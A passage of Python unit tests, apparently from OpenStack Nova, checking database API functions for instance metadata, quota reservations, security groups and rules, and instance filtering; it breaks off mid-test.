class InstanceSystemMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_system_metadata_* methods."""
def setUp(self):
super(InstanceSystemMetadataTestCase, self).setUp()
values = {'host': 'h1', 'project_id': 'p1',
'system_metadata': {'key': 'value'}}
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, values)
def test_instance_system_metadata_get(self):
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value'})
def test_instance_system_metadata_update_new_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
def test_instance_system_metadata_update_existent_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'new_value'})
def test_instance_system_metadata_update_delete_true(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
@test.testtools.skip("bug 1189462")
def test_instance_system_metadata_update_nonexistent(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_system_metadata_update,
self.ctxt, 'nonexistent-uuid',
{'key': 'value'}, True)
class ReservationTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.reservation_* methods."""
def setUp(self):
super(ReservationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
usage = db.quota_usage_get(self.ctxt, 'project1', 'resource1', 'user1')
self.values = {'uuid': 'sample-uuid',
'project_id': 'project1',
'user_id': 'user1',
'resource': 'resource1',
'delta': 42,
'expire': timeutils.utcnow() + datetime.timedelta(days=1),
'usage': {'id': usage.id}}
def test_reservation_commit(self):
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
db.reservation_commit(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 2},
'fixed_ips': {'reserved': 0, 'in_use': 4}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_rollback(self):
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
db.reservation_rollback(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_expire(self):
db.reservation_expire(self.ctxt)
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
class SecurityGroupRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(SecurityGroupRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _get_base_rule_values(self):
return {
'protocol': "tcp",
'from_port': 80,
'to_port': 8080,
'cidr': None,
'deleted': 0,
'deleted_at': None,
'grantee_group': None,
'updated_at': None
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def _create_security_group_rule(self, values):
v = self._get_base_rule_values()
v.update(values)
return db.security_group_rule_create(self.ctxt, v)
def test_security_group_rule_create(self):
security_group_rule = self._create_security_group_rule({})
self.assertIsNotNone(security_group_rule['id'])
for key, value in self._get_base_rule_values().items():
self.assertEqual(value, security_group_rule[key])
def _test_security_group_rule_get_by_security_group(self, columns=None):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
security_group = self._create_security_group({
'instances': [instance]})
security_group_rule = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
security_group_rule1 = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
found_rules = db.security_group_rule_get_by_security_group(
self.ctxt, security_group['id'], columns_to_join=columns)
self.assertEqual(len(found_rules), 2)
rules_ids = [security_group_rule['id'], security_group_rule1['id']]
for rule in found_rules:
if columns is None:
self.assertIn('grantee_group', dict(rule.iteritems()))
self.assertIn('instances',
dict(rule.grantee_group.iteritems()))
self.assertIn(
'system_metadata',
dict(rule.grantee_group.instances[0].iteritems()))
self.assertIn(rule['id'], rules_ids)
else:
self.assertNotIn('grantee_group', dict(rule.iteritems()))
def test_security_group_rule_get_by_security_group(self):
self._test_security_group_rule_get_by_security_group()
def test_security_group_rule_get_by_security_group_no_joins(self):
self._test_security_group_rule_get_by_security_group(columns=[])
def test_security_group_rule_get_by_security_group_grantee(self):
security_group = self._create_security_group({})
security_group_rule = self._create_security_group_rule(
{'grantee_group': security_group})
rules = db.security_group_rule_get_by_security_group_grantee(self.ctxt,
security_group['id'])
self.assertEqual(len(rules), 1)
self.assertEqual(rules[0]['id'], security_group_rule['id'])
def test_security_group_rule_destroy(self):
self._create_security_group({'name': 'fake1'})
self._create_security_group({'name': 'fake2'})
security_group_rule1 = self._create_security_group_rule({})
security_group_rule2 = self._create_security_group_rule({})
db.security_group_rule_destroy(self.ctxt, security_group_rule1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get,
self.ctxt, security_group_rule1['id'])
self._assertEqualObjects(db.security_group_rule_get(self.ctxt,
security_group_rule2['id']),
security_group_rule2, ['grantee_group'])
def test_security_group_rule_destroy_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_destroy, self.ctxt, 100500)
def test_security_group_rule_get(self):
security_group_rule1 = (
self._create_security_group_rule({}))
self._create_security_group_rule({})
real_security_group_rule = db.security_group_rule_get(self.ctxt,
security_group_rule1['id'])
self._assertEqualObjects(security_group_rule1,
real_security_group_rule, ['grantee_group'])
def test_security_group_rule_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get, self.ctxt, 100500)
def test_security_group_rule_count_by_group(self):
sg1 = self._create_security_group({'name': 'fake1'})
sg2 = self._create_security_group({'name': 'fake2'})
rules_by_group = {sg1: [], sg2: []}
for group in rules_by_group:
rules = rules_by_group[group]
for i in range(0, 10):
rules.append(
self._create_security_group_rule({'parent_group_id':
group['id']}))
db.security_group_rule_destroy(self.ctxt,
rules_by_group[sg1][0]['id'])
counted_groups = [db.security_group_rule_count_by_group(self.ctxt,
group['id'])
for group in [sg1, sg2]]
expected = [9, 10]
self.assertEqual(counted_groups, expected)
class SecurityGroupTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(SecurityGroupTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def test_security_group_create(self):
security_group = self._create_security_group({})
self.assertIsNotNone(security_group['id'])
for key, value in self._get_base_values().iteritems():
self.assertEqual(value, security_group[key])
def test_security_group_destroy(self):
security_group1 = self._create_security_group({})
security_group2 = \
self._create_security_group({'name': 'fake_sec_group2'})
db.security_group_destroy(self.ctxt, security_group1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get,
self.ctxt, security_group1['id'])
self._assertEqualObjects(db.security_group_get(
self.ctxt, security_group2['id'],
columns_to_join=['instances']), security_group2)
def test_security_group_get(self):
security_group1 = self._create_security_group({})
self._create_security_group({'name': 'fake_sec_group2'})
real_security_group = db.security_group_get(self.ctxt,
security_group1['id'],
columns_to_join=['instances'])
self._assertEqualObjects(security_group1,
real_security_group)
def test_security_group_get_with_instance_columns(self):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
secgroup = self._create_security_group({'instances': [instance]})
secgroup = db.security_group_get(
self.ctxt, secgroup['id'],
columns_to_join=['instances.system_metadata'])
inst = secgroup.instances[0]
self.assertIn('system_metadata', dict(inst.iteritems()).keys())
def test_security_group_get_no_instances(self):
instance = db.instance_create(self.ctxt, {})
sid = self._create_security_group({'instances': [instance]})['id']
security_group = db.security_group_get(self.ctxt, sid,
columns_to_join=['instances'])
self.assertIn('instances', security_group.__dict__)
security_group = db.security_group_get(self.ctxt, sid)
self.assertNotIn('instances', security_group.__dict__)
def test_security_group_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get, self.ctxt, 100500)
def test_security_group_get_by_name(self):
security_group1 = self._create_security_group({'name': 'fake1'})
security_group2 = self._create_security_group({'name': 'fake2'})
real_security_group1 = db.security_group_get_by_name(
self.ctxt,
security_group1['project_id'],
security_group1['name'],
columns_to_join=None)
real_security_group2 = db.security_group_get_by_name(
self.ctxt,
security_group2['project_id'],
security_group2['name'],
columns_to_join=None)
self._assertEqualObjects(security_group1, real_security_group1)
self._assertEqualObjects(security_group2, real_security_group2)
def test_security_group_get_by_project(self):
security_group1 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake2', 'project_id': 'fake_proj2'})
real1 = db.security_group_get_by_project(
self.ctxt,
security_group1['project_id'])
real2 = db.security_group_get_by_project(
self.ctxt,
security_group2['project_id'])
expected1, expected2 = [security_group1], [security_group2]
self._assertEqualListsOfObjects(expected1, real1,
ignored_keys=['instances'])
self._assertEqualListsOfObjects(expected2, real2,
ignored_keys=['instances'])
def test_security_group_get_by_instance(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'name': 'fake1', 'instances': [instance]},
{'name': 'fake2', 'instances': [instance]},
{'name': 'fake3', 'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_by_instance(self.ctxt,
instance['uuid'])
expected = security_groups[:2]
self._assertEqualListsOfObjects(expected, real,
ignored_keys=['instances'])
def test_security_group_get_all(self):
values = [
{'name': 'fake1', 'project_id': 'fake_proj1'},
{'name': 'fake2', 'project_id': 'fake_proj2'},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_all(self.ctxt)
self._assertEqualListsOfObjects(security_groups, real,
ignored_keys=['instances'])
def test_security_group_in_use(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'instances': [instance],
'name': 'fake_in_use'},
{'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = []
for security_group in security_groups:
in_use = db.security_group_in_use(self.ctxt,
security_group['id'])
real.append(in_use)
expected = [True, False]
self.assertEqual(expected, real)
def test_security_group_ensure_default(self):
self.ctxt.project_id = 'fake'
self.ctxt.user_id = 'fake'
self.assertEqual(0, len(db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)))
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
self.assertEqual("default", security_groups[0]["name"])
usage = db.quota_usage_get(self.ctxt,
self.ctxt.project_id,
'security_groups',
self.ctxt.user_id)
self.assertEqual(1, usage.in_use)
@mock.patch.object(db.sqlalchemy.api, '_security_group_get_by_names')
def test_security_group_ensure_default_called_concurrently(self, sg_mock):
# make sure NotFound is always raised here to trick Nova to insert the
# duplicate security group entry
sg_mock.side_effect = exception.NotFound
# create the first db entry
self.ctxt.project_id = 1
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
# create the second one and ensure the exception is handled properly
default_group = db.security_group_ensure_default(self.ctxt)
self.assertEqual('default', default_group.name)
def test_security_group_update(self):
security_group = self._create_security_group({})
new_values = {
'name': 'sec_group1',
'description': 'sec_group_descr1',
'user_id': 'fake_user1',
'project_id': 'fake_proj1',
}
updated_group = db.security_group_update(self.ctxt,
security_group['id'],
new_values,
columns_to_join=['rules.grantee_group'])
for key, value in new_values.iteritems():
self.assertEqual(updated_group[key], value)
self.assertEqual(updated_group['rules'], [])
def test_security_group_update_to_duplicate(self):
self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj2'})
self.assertRaises(exception.SecurityGroupExists,
db.security_group_update,
self.ctxt, security_group2['id'],
{'project_id': 'fake_proj1'})
class InstanceTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.instance_* methods."""
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'},
}
def setUp(self):
super(InstanceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _assertEqualInstances(self, instance1, instance2):
self._assertEqualObjects(instance1, instance2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def _assertEqualListsOfInstances(self, list1, list2):
self._assertEqualListsOfObjects(list1, list2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def create_instance_with_args(self, **kwargs):
if 'context' in kwargs:
context = kwargs.pop('context')
else:
context = self.ctxt
args = self.sample_data.copy()
args.update(kwargs)
return db.instance_create(context, args)
def test_instance_create(self):
instance = self.create_instance_with_args()
self.assertTrue(uuidutils.is_uuid_like(instance['uuid']))
def test_instance_create_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at', 'scheduled_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at', 'scheduled_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_no_metadata_clobber(self):
meta = {'foo': 'bar'}
sys_meta = {'sfoo': 'sbar'}
values = {
'metadata': meta,
'system_metadata': sys_meta,
}
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual({'foo': 'bar'}, meta)
self.assertEqual({'sfoo': 'sbar'}, sys_meta)
def test_instance_get_all_with_meta(self):
inst = self.create_instance_with_args()
for inst in db.instance_get_all(self.ctxt):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_update(self):
instance = self.create_instance_with_args()
metadata = {'host': 'bar', 'key2': 'wuff'}
system_metadata = {'original_image_ref': 'baz'}
# Update the metadata
db.instance_update(self.ctxt, instance['uuid'], {'metadata': metadata,
'system_metadata': system_metadata})
# Retrieve the user-provided metadata to ensure it was successfully
# updated
self.assertEqual(metadata,
db.instance_metadata_get(self.ctxt, instance['uuid']))
self.assertEqual(system_metadata,
db.instance_system_metadata_get(self.ctxt, instance['uuid']))
def test_instance_update_bad_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '123'}
self.assertRaises(ValueError,
db.instance_update,
self.ctxt, instance['uuid'], values)
def test_instance_update_good_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '2011-01-31T00:00:00.0'}
actual = db.instance_update(self.ctxt, instance['uuid'], values)
expected = datetime.datetime(2011, 1, 31)
self.assertEqual(expected, actual["created_at"])
def test_create_instance_unique_hostname(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
self.create_instance_with_args(hostname='h1', project_id='p1')
# With scope 'global' any duplicate should fail, be it this project:
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p3')
# or another:
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context2,
hostname='h1', project_id='p2')
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p1')
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
self.create_instance_with_args(context=context2, hostname='h2')
self.flags(osapi_compute_unique_server_name_scope=None)
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_all_by_filters_extra_columns(self,
mock_joinedload,
mock_undefer):
db.instance_get_all_by_filters_sort(
self.ctxt, {},
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_active_by_window_extra_columns(self,
mock_joinedload,
mock_undefer):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
db.instance_get_active_by_window_joined(
self.ctxt, now,
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
def test_instance_get_all_by_filters_with_meta(self):
inst = self.create_instance_with_args()
for inst in db.instance_get_all_by_filters(self.ctxt, {}):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_without_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt, {},
columns_to_join=[])
for inst in result:
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_all_by_filters(self):
instances = [self.create_instance_with_args() for i in range(3)]
filtered_instances = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfInstances(instances, filtered_instances)
def test_instance_get_all_by_filters_zero_limit(self):
self.create_instance_with_args()
instances = db.instance_get_all_by_filters(self.ctxt, {}, limit=0)
self.assertEqual([], instances)
def test_instance_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
meta = sqlalchemy_api._instance_metadata_get_multi(self.ctxt, uuids)
for row in meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_metadata_get_multi(self.ctxt, [])
def test_instance_system_system_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
sys_meta = sqlalchemy_api._instance_system_metadata_get_multi(
self.ctxt, uuids)
for row in sys_meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_system_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_system_metadata_get_multi(self.ctxt, [])
def test_instance_get_all_by_filters_regex(self):
i1 = self.create_instance_with_args(display_name='test1')
i2 = self.create_instance_with_args(display_name='teeeest2')
self.create_instance_with_args(display_name='diff')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': 't.*st.'})
self._assertEqualListsOfInstances(result, [i1, i2])
def test_instance_get_all_by_filters_changes_since(self):
i1 = self.create_instance_with_args(updated_at=
'2013-12-05T15:03:25.000000')
i2 = self.create_instance_with_args(updated_at=
'2013-12-05T15:03:26.000000')
changes_since = iso8601.parse_date('2013-12-05T15:03:25.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i1, i2], result)
changes_since = iso8601.parse_date('2013-12-05T15:03:26.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i2], result)
def test_instance_get_all_by_filters_exact_match(self):
instance = self.create_instance_with_args(host='host1')
self.create_instance_with_args(host='host12')
result = db.instance_get_all_by_filters(self.ctxt,
{'host': 'host1'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_metadata(self):
instance = self.create_instance_with_args(metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_system_metadata(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_unicode_value(self):
instance = self.create_instance_with_args(display_name=u'test♥')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': u'test'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_tags(self):
instance = self.create_instance_with_args(
metadata={'foo': 'bar'})
self.create_instance_with_args()
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
{'name': 'tag-value', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For non-existent tag
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'barred'},
]})
self.assertEqual([], result)
# Confirm with deleted tags
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'foo')
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
]})
self.assertEqual([], result)
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-value', 'value': 'bar'}
]})
self.assertEqual([], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self.assertEqual([], result)
def test_instance_get_by_uuid(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'])
self._assertEqualInstances(inst, result)
def test_instance_get_by_uuid_join_empty(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=[])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_sys_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['system_metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_no_soft_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True,
'soft_deleted': False})
self._assertEqualListsOfObjects([inst1], result,
ignored_keys=['deleted', 'deleted_at', 'metadata',
'system_metadata', 'info_cache', 'pci_devices',
'extra'])
def test_instance_get_all_by_filters_alive_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False,
'soft_deleted': True})
self._assertEqualListsOfInstances([inst2, inst3], result)
def test_instance_get_all_by_filters_not_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
inst4 = self.create_instance_with_args(vm_state=vm_states.ACTIVE)
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False})
self.assertIsNone(inst3.vm_state)
self._assertEqualListsOfInstances([inst3, inst4], result)
def test_instance_get_all_by_filters_cleaned(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_update(self.ctxt, inst1['uuid'], {'cleaned': 1})
result = db.instance_get_all_by_filters(self.ctxt, {})
self.assertEqual(2, len(result))
self.assertIn(inst1['uuid'], [result[0]['uuid'], result[1]['uuid']])
self.assertIn(inst2['uuid'], [result[0]['uuid'], result[1]['uuid']])
if inst1['uuid'] == result[0]['uuid']:
self.assertTrue(result[0]['cleaned'])
self.assertFalse(result[1]['cleaned'])
else:
self.assertTrue(result[1]['cleaned'])
self.assertFalse(result[0]['cleaned'])
def test_instance_get_all_by_filters_tag_any(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t3])
db.instance_tag_set(self.ctxt, inst3.uuid, [t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t1, t2]})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_any_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t3, t4]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t3])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
